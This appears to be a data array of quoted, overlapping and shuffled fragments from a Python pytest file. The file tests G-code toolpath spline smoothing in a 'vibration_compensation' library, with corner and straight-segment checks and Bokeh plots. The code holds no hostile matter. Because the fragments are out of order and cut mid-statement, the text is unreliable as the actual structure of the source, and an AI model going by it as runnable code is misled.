"s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert np.sum(data.smoothed_toolpath.segment_lengths) == pytest.approx(200, abs=0.1) check_distances(data)",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20",
"10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\"",
"corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3,",
"of the spline segment does not match the line start point\" assert_array_almost_equal(self.spline(self.spline_start), self.start_point,",
"== \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_obtuse_corner(plotter): data =",
"and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The",
"the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0,",
"0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s,",
"data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths =",
"\\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([",
"0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert",
"pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline segment is",
"on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self):",
"= data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start =",
"- np.linalg.norm(linea - lineb) def point_on_middle_of_line(linea, lineb, point): mid = (lineb - linea)",
"X200 Y1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"if corner: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s]",
"msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the spline segment is",
"* line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <=",
"is before the line segment end\" corner_error = \"The closest point of the",
"s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\")",
"very short straight_segment(data, l=1, s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data,",
"X10 Y0\", \"G1 X20 Y0.1\", \"G1 X30 Y0.3\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"= s self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point =",
"s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\")",
"\\ msg def check_start_point_start(self): msg = \"The start point of the spline segment",
"msg def check_end_point_end(self): msg = \"The end point of the spline segment does",
"X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 2 straight_segment(data, l=0, s=0, start=\"start\", end=\"end\")",
"0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1)",
"of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1,",
"start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10,",
"middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_start)) == pytest.approx(0, abs=1e-3), msg self.check_distance(self.spline_start,",
"line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg self.check_distance(self.spline_mid, 0.5) def check_point_on_line(self):",
"test_very_obtuse_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X200 Y1\" ], maximum_error=0.01) assert",
"else: assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start, end):",
"np import scipy as sp import vibration_compensation.bokeh_imports as plt @pytest.fixture(scope=\"module\") def figures(): path,",
"\"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"msg def check_line_start_point_middle(self): msg = \"The start point of the spline segment is",
"s, start, end, True) checker.check_corner_spline_order() if start == \"on\": checker.check_start_point_on() elif start ==",
"assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([ \"G1",
"(self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1) self.start_line_dist =",
"self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0]",
"else: checker.check_corner_middle_short() if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else:",
"+ linea return np.linalg.norm(point - mid) class SegmentChecker(object): def __init__(self,data, l, s, start,",
"assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg",
"line): msg = \"The spline start distance does not match\" if line <=",
"== \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data =",
"\\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter):",
"50]) ) check_distances(data) plotter(data) def test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1",
"corner spline is before the line segment end\" corner_error = \"The closest point",
"check_end_point_end(self): msg = \"The end point of the spline segment does not match",
"data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert",
"of the corner is not close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid))",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\") straight_segment(data, l=1,",
"generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3",
"l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"= \"There's a discontinuity at the end of the spline segment\" if self.s",
"X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5",
"plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures,",
"s self.start = start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l]",
"self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist and \\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1),",
"def check_continuity(self): msg = \"There's a discontinuity at the end of the spline",
"end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1])",
"start self.end = end self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l !=",
"check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end",
"assert False, \"Invalid end type\" checker.check_continuity() def corner_segment(data, l, s, start, end): checker",
"lod_threshold=None, title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1,",
"line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg",
"of the line\" assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The",
"np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_135_corner(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"check_start_point_start(self): msg = \"The start point of the spline segment does not match",
"of the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid))",
"\"The middle point of the spline segment is not on the line\" assert",
"start type\" if start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line()",
"s=1, start=\"middle\", end=\"middle\") # Note that this line is very short straight_segment(data, l=1,",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] ==",
"straight_segment(data, l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) +",
") figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea - point) +",
"(lineb - linea) * 0.5 + linea return np.linalg.norm(point - mid) class SegmentChecker(object):",
"= l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end =",
"self.s > 0: prev_end = self.data.smoothed_toolpath.segment_end[self.s-1] assert prev_end == self.spline_start, \\ \"The previous",
"X-200 Y-100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) ==",
"\"There's a discontinuity at the end of the spline segment\" if self.s >",
"self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of the",
"\"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start == \"middle\" or",
"np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100,",
"os from vibration_compensation import read_gcode, Data import pytest from numpy.testing import * import",
"== \\ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data =",
"start=\"on\", end=\"on\") straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths)",
"start == \"start\": checker.check_start_point_start() elif start == \"on\": checker.check_start_point_on() elif start == \"middle\":",
"point of the spline segment does not match the line end point\" assert_array_almost_equal(self.spline(self.spline_end),",
"if end == \"on\": checker.check_corner_end_point_on() elif end == \"middle\": checker.check_corner_end_point_middle() else: assert False,",
"self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end,",
"plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error):",
"self.spline_mid = (self.spline_start + self.spline_end) / 2.0 xy_lengths = np.linalg.norm(data.end_xy - data.start_xy, axis=1)",
"== \\ pytest.approx(0, abs=1e-12), msg def check_line_start_point_middle(self): msg = \"The start point of",
"assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 +",
"check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self):",
"start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"on\") corner_segment(data, l=1, s=3, start=\"on\", end=\"on\") straight_segment(data,",
"elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if start",
"self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_mid = l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start",
"X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"test_90_corner(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\" ], maximum_error=0.01) assert",
"3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1,",
"abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ \"G1 X100 Y0\", \"G1 X100",
"of the spline segment is not on the end of the line\" assert_array_almost_equal(self.spline(self.spline_start),",
"points[:,1], line_width=2, line_color=\"blue\", line_dash=\"solid\" ) p.circle( points[:,0], points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return",
"+ np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ \"G1 X20",
"self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the spline segment is not",
"lineb, point): return np.linalg.norm(linea - point) + np.linalg.norm(lineb - point)\\ - np.linalg.norm(linea -",
"], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0,",
"middle point of the spline segment is not on the line\" assert point_on_line(self.start_point,",
"line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0) assert self.spline.distance(spline) <= line_dist",
"= [] yield ret plt.save(ret) def generate_curves(gcode, maximum_error): data = read_gcode(gcode, maximum_error) return",
"the line segment end\" corner_error = \"The closest point of the corner is",
"segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_start)) == \\ pytest.approx(0,",
"not on the middle of the line\" def check_end_point_middle(self): assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end))",
"start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data,",
"l=1, s=1, start=\"start\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx( np.linalg.norm([50, 50]) + np.linalg.norm([50,",
"os.makedirs(path, exist_ok=True) plt.output_file(os.path.join(path, os.path.splitext(filename)[0] + \".html\")) ret = [] yield ret plt.save(ret) def",
"\\ self.spline.distance(spline) == pytest.approx(line_dist, abs=0.1), \\ msg def check_start_point_start(self): msg = \"The start",
"\"middle\": checker.check_corner_end_point_middle() else: assert False, \"Invalid end type\" checker.check_continuity() def check_distances(data): t =",
"== \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0,",
"self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end))",
"data.smoothed_toolpath.total_distance(), 10) assert_array_almost_equal(data.smoothed_toolpath.distance(t), np.linspace(0, data.smoothed_toolpath.total_distance(), 10)) def test_straight_line(plotter): data = generate_curves([ \"G1 X100",
"< 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([20, 0.1]),",
"self.start_line_dist + self.line_length * line else: line_dist = self.start_next_line_dist + self.next_line_length * (line-1.0)",
"s=2, start=\"on\", end=\"end\") straight_segment(data, l=1, s=3, start=\"end\", end=\"end\") straight_segment(data, l=3, s=4, start=\"start\", end=\"end\")",
"check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert",
"1.0) end_error_segment = \"The end point of the spline segment is not on",
"= generate_curves([ \"G1 X100 Y0\", \"G1 X100 Y100\", \"G1 Z10\", \"G1 X0 Y100\"",
"corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <",
"@pytest.fixture(scope=\"module\") def figures(): path, filename = os.path.split(os.path.realpath(__file__)) path = os.path.join(path, \"output\") os.makedirs(path, exist_ok=True)",
"at the end of the spline segment\" if self.s > 0: prev_end =",
"plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250,",
"checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() else: assert False, \"Invalid start type\" if",
"l + 1.0 self.spline_end = data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s]",
"close enough\" def check_corner_middle_normal(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) <= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0)",
"self.check_distance(self.spline_start, 0.5) def check_line_start_point_end(self): msg = \"The start point of the spline segment",
"check_continuity(self): msg = \"There's a discontinuity at the end of the spline segment\"",
"l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note that this",
"self.spline_start, \\ \"The previous segment does not end where the current one starts\"",
"self.start_point = data.start_xy[l] self.end_point = data.end_xy[l] if l != data.start_xy.shape[0] - 1: self.next_start_point",
"start type\" if start == \"middle\" or end == \"middle\": checker.check_corner_middle_normal() else: checker.check_corner_middle_short()",
"the spline segment is not on the line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) ==",
"self.spline_end > self.spline_mid, \\ \"The endpoint of the corner spline is before the",
"and the current segment start do not match up\" def check_corner_spline_order(self): assert self.spline_end",
"@pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250,",
"abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\",
"straight_segment(data, l=2, s=4, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \\",
"of the spline segment is not on the middle of the line\" def",
"assert_array_almost_equal(self.spline(self.spline_end), self.end_point), msg self.check_distance(self.spline_end, 1.0) end_error_segment = \"The end point of the spline",
"assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_end)) == \\ pytest.approx(0, abs=1e-12), SegmentChecker.end_error_segment def check_corner_end_point_on(self): assert point_on_line(self.next_start_point,",
"== \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end == \"end\": checker.check_end_point_end() elif end ==",
"<=\\ self.spline.distance(self.spline_start) and \\ self.spline.distance(self.spline_start-1e-12) == \\ pytest.approx(self.spline.distance(self.spline_start), abs=0.001), \\ \"The previous segment",
"maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0,",
"assert_array_almost_equal(self.spline(self.spline_start), self.end_point, err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of",
"on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12),",
"s=2, start=\"middle\", end=\"middle\") corner_segment(data, l=1, s=3, start=\"middle\", end=\"middle\") straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\")",
"plot(data: Data): p = plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None,",
"data = generate_curves([ \"G1 X100 Y200\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 1 straight_segment(data,",
"Z10\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0,",
"Y0\", \"G1 X30 Y0.1\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths)",
"title=request.node.name ) p.segment( x0=data.start_xy[:, 0], x1=data.end_xy[:, 0], y0=data.start_xy[:, 1], y1=data.end_xy[:, 1], line_width=1, line_color=\"red\",",
"up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of the corner",
"\"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\"",
"data = generate_curves([ \"G1 X100 Y0\", \"G1 X0 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0]",
"straight_segment(data, l, s, start, end): checker = SegmentChecker(data, l, s, start, end, False)",
"end point of the spline segment does not match the line end point\"",
"= data.smoothed_toolpath.segment_end[s] else: self.spline_start = data.smoothed_toolpath.segment_start[s] self.spline_end = data.smoothed_toolpath.segment_end[s] self.spline_mid = (self.spline_start +",
"point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 0.5) def check_corner_end_point_middle(self): assert point_on_middle_of_line(self.next_start_point,",
"s=1, start=\"middle\", end=\"middle\") straight_segment(data, l=1, s=2, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 +",
"< 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(20 + np.linalg.norm([10, 0.1]),",
"points[:,1], size=4, fill_color=\"white\" ) figures.append(p) return plot def point_on_line(linea, lineb, point): return np.linalg.norm(linea",
"s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) < 200.0 assert",
"5 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"middle\") # Note",
"\"G1 X100 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\",",
"SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01, abs=1e-12), \\",
"Y0\", \"G1 X200 Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0,",
"line_width=1, line_color=\"red\", line_dash=\"dotted\" ) ts = data.smoothed_toolpath.fixed_curvature_speeds(0, data.smoothed_toolpath.start_xy.shape[0], 0.1) points = data.smoothed_toolpath(ts) p.line(",
"\\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def test_very_acute_corner(plotter): data = generate_curves([",
"== \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start",
"end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) ==\\ pytest.approx(np.linalg.norm([100, 200])) check_distances(data) plotter(data) def test_two_straight_lines(plotter): data = generate_curves([",
"== \\ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data =",
"self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-3),\\ SegmentChecker.end_error_segment_middle self.check_distance(self.spline_end, 1.5) def check_continuity(self): msg = \"There's",
"np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ \"G1 X100 Y0\",",
"= data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start = data.smoothed_toolpath.segment_start[s]",
"== pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point of the spline segment",
"start == \"start\" and end == \"end\": checker.check_point_on_middle_of_line() else: checker.check_point_on_line() if end ==",
"check_line_start_point_middle(self): msg = \"The start point of the spline segment is not on",
"err_msg=msg) self.check_distance(self.spline_start, 1.0) def check_point_on_middle_of_line(self): msg = \"The middle point of the spline",
"\"The middle point of the spline segment is not on the middle of",
"segment is not on the middle of the line\" assert point_on_middle_of_line(self.start_point, self.end_point, self.spline(self.spline_mid))",
"maximum_error): data = read_gcode(gcode, maximum_error) return data @pytest.fixture(scope=\"function\") def plotter(figures, request): def plot(data:",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"middle\") corner_segment(data, l=0, s=1, start=\"middle\", end=\"on\")",
"checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end() else: assert False, \"Invalid start type\" if",
"= plt.Figure( plot_width=1000, plot_height=1000, x_range=(-250, 250), y_range=(-250, 250), match_aspect=True, lod_threshold=None, title=request.node.name ) p.segment(",
"line\" assert point_on_line(self.start_point, self.end_point, self.spline(self.spline_mid)) == pytest.approx(0, abs=1e-12), msg def check_end_point_end(self): msg =",
"<= 0.01,\\ SegmentChecker.corner_error self.check_distance(self.spline_mid, 1.0) def check_corner_middle_short(self): assert np.linalg.norm(self.end_point - self.spline(self.spline_mid)) ==\\ pytest.approx(0.01,",
"not match up\" def check_corner_spline_order(self): assert self.spline_end > self.spline_mid, \\ \"The endpoint of",
"Y100\" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") corner_segment(data,",
"l=0, s=0, start=\"start\", end=\"on\") corner_segment(data, l=0, s=1, start=\"on\", end=\"on\") straight_segment(data, l=1, s=2, start=\"on\",",
"100]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(100 + np.linalg.norm([100, 100]), abs=0.1) check_distances(data) plotter(data) def",
"self.next_start_point = data.start_xy[l+1] self.next_end_point = data.end_xy[l+1] self.spline = data.smoothed_toolpath if corner: self.spline_start =",
"== \"on\": checker.check_start_point_on() elif start == \"middle\": checker.check_line_start_point_middle() elif start == \"end\": checker.check_line_start_point_end()",
"assert np.sum(data.smoothed_toolpath.segment_lengths) == \\ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data)",
"straight_segment(data, l=2, s=4, start=\"middle\", end=\"end\") assert np.sum(data.smoothed_toolpath.segment_lengths) <\\ 10 + np.linalg.norm([10, 0.1]) +",
"pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ \"G1 X10 Y0\", \"G1",
"data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start=\"start\", end=\"on\") straight_segment(data, l=0, s=0, start=\"start\", end=\"on\")",
"assert point_on_line(self.next_start_point, self.next_end_point, self.spline(self.spline_end)) == pytest.approx(0, abs=1e-12),\\ SegmentChecker.end_error_segment end_error_segment_middle = \"The end point",
"abs=0.1) check_distances(data) plotter(data) def test_135_corner_counter_clockwise(plotter): data = generate_curves([ \"G1 X-100 Y-100\", \"G1 X-200",
